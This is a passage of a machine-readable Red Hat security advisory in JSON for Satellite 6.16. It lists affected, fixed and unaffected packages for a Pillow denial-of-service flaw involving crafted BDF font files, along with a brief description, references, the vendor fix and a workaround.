"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497452"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by providing a specially crafted BDF font file. The library\u0027s image processing function fails to properly validate dimensions from the font file, bypassing a critical security check designed to prevent excessive memory usage. This oversight can lead to the system consuming an unreasonable amount of memory, making it unavailable to legitimate users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via crafted BDF font file",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in the Pillow Python imaging library. The BDF font file parser passes attacker-controlled dimensions to Image.new() without decompression bomb validation, allowing excessive memory allocation and denial of service.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64"
],
"known_not_affected": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-55379"
},
{
"category": "external",
"summary": "RHBZ#2497452",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497452"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-55379",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-55379"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-55379",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55379"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d",
"url": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-45hq-cxwh-f6vc",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-45hq-cxwh-f6vc"
}
],
"release_date": "2026-07-06T18:52:11.633000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T16:04:50+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor detailed instructions how to apply this update, refer to:\n\nhttps://docs.redhat.com/en/documentation/red_hat_satellite/6.16/html/updating_red_hat_satellite/index",
"product_ids": [
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50223"
},
{
"category": "workaround",
"details": "Do not load BDF font files from untrusted sources. Applications that only process standard image formats (PNG, JPEG, etc.) and do not use BdfFontFile or ImageFont.load() with BDF files are not affected.",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
